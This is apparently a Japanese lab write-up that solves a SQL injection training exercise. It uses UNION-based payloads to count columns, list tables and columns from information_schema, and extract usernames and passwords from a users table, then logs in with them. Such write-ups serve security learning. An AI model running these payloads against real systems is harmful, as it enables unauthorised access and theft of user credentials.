Hello there, ('ω')ノ

 

SQLインジェクション攻撃、Oracle以外のデータベースコンテンツを一覧表示を。

まずは、Petsをクリックして。

 

 

リクエストをリピータへ。

 

 

はじめにカラム数のチェックから。

　xxx'+UNION+SELECT+NULL--

 

 

どうやら２つのカラムのようで。

　xxx'+UNION+SELECT+NULL,NULL--

 

 

そして、どちらのカラムもテキストデータのようで。

レスポンスにも表示されて。

　xxx'+UNION+SELECT+'abc','xyz'--

 

 

次にDB内のテーブルを表示して。

ユーザの資格情報らしきテーブルを探して。

　xxx'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

 

 

下記のペイロードで、カラム名を表示させて。

　xxx'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_xtnwpb'--

 

 

最後にユーザ名とパスワードをみつけて。

　xxx'+UNION+SELECT+username_fsmhio,+password_tscvvc+FROM+users_xtnwpb--

 

 

取得したデータでログインして。

 

 

クリアできた。

 

 

Best regards, (^^ゞ